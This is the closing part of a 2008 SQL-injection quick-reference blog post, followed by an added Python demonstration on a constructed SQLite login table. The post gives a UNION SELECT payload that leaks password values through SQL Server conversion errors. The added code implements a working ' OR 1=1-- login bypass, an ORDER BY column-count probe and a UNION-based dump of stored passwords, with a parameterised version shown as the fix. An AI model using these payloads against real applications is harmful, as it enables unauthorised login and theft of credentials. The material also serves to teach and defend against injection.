example: ' union select min(passwd) FROM Passwords WHERE passwd > 'a'--

What it tries to do is select the smallest passwd value greater than 'a' and convert it to an integer (to line up
with the original query's integer column), which SQL Server refuses with an error like: error converting varchar
value 'ants' to column type integer. The error thereby leaks the value. Have had this work once, but that's about
it. The rest of the time it just returned an error with just that single letter.
---------------------------------------------------------------------------------------------------------
Well, that's it for this one; it was supposed to be a quick reference. Will get more into
these commands and what you can do with them in the next article, along with
more advanced commands. Understand that these are in a form-based format: the injection goes into a form field,
between the application's own quotes.

by r3dr0ot | 2008/02/18 20:17 | SQL injection | Trackback(13)
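An added example for this page (not the reference's own material; SQLite stands in for the database, so the SQL Server-specific HAVING and convert-to-int errors above cannot be reproduced here, and the users table is constructed): a login form that splices both fields into its query between the developer's own quotes, the ' or 1=1-- bypass, the ' ORDER BY n-- column-count probe, a UNION SELECT that reads an arbitrary column through the field the form displays, and the parameterised version that the same inputs bounce off.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed login table (SQLite standing in for the real backend)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Form fields spliced into the statement between the developer's own quotes.
    Returns the username column of the first matching row (what the page would
    greet you with), or None."""
    sql = (f"SELECT id, username, passwd FROM users "
           f"WHERE username='{username}' AND passwd='{password}'")
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def login_fixed(conn, username: str, password: str):
    """Same query with bound parameters: the input can never close the quote."""
    row = conn.execute("SELECT id, username, passwd FROM users WHERE username=? AND passwd=?",
                       (username, password)).fetchone()
    return row[1] if row else None


def probe_columns(conn, limit: int = 20) -> int:
    """' ORDER BY n--: walk n upwards; the first n that errors is one past the
    column count of the query we are injecting into."""
    for n in range(1, limit + 1):
        try:
            login_vulnerable(conn, f"' ORDER BY {n}--", "")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError(f"no ORDER BY error up to {limit}")


def union_dump(conn, table: str, column: str, where: str = "1=1") -> str:
    """Once the column count is known, UNION a row whose displayed column holds
    whatever we want to read; the form then prints it as the 'username'."""
    n = probe_columns(conn)
    cols = ["1"] * n
    cols[1] = column                      # position 1 is the column the form echoes
    payload = f"' UNION SELECT {','.join(cols)} FROM {table} WHERE {where}--"
    return login_vulnerable(conn, payload, "")


if __name__ == "__main__":
    db = make_db()
    print("bypass  :", login_vulnerable(db, "' OR 1=1--", "anything"))
    print("columns :", probe_columns(db))
    print("dump    :", union_dump(db, "users", "passwd", "username='admin'"))
    print("fixed   :", login_fixed(db, "' OR 1=1--", "anything"))
```

The bypass returns the first row, which is admin here only because it has the lowest rowid; on a real application the row order is whatever the database feels like, which is why the reference says it merely gives you "the first value that exists". probe_columns() relies on ORDER BY failing at statement preparation time, which it does in every mainstream engine, so the same probe transfers to the SQL Server setting the reference was written for.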
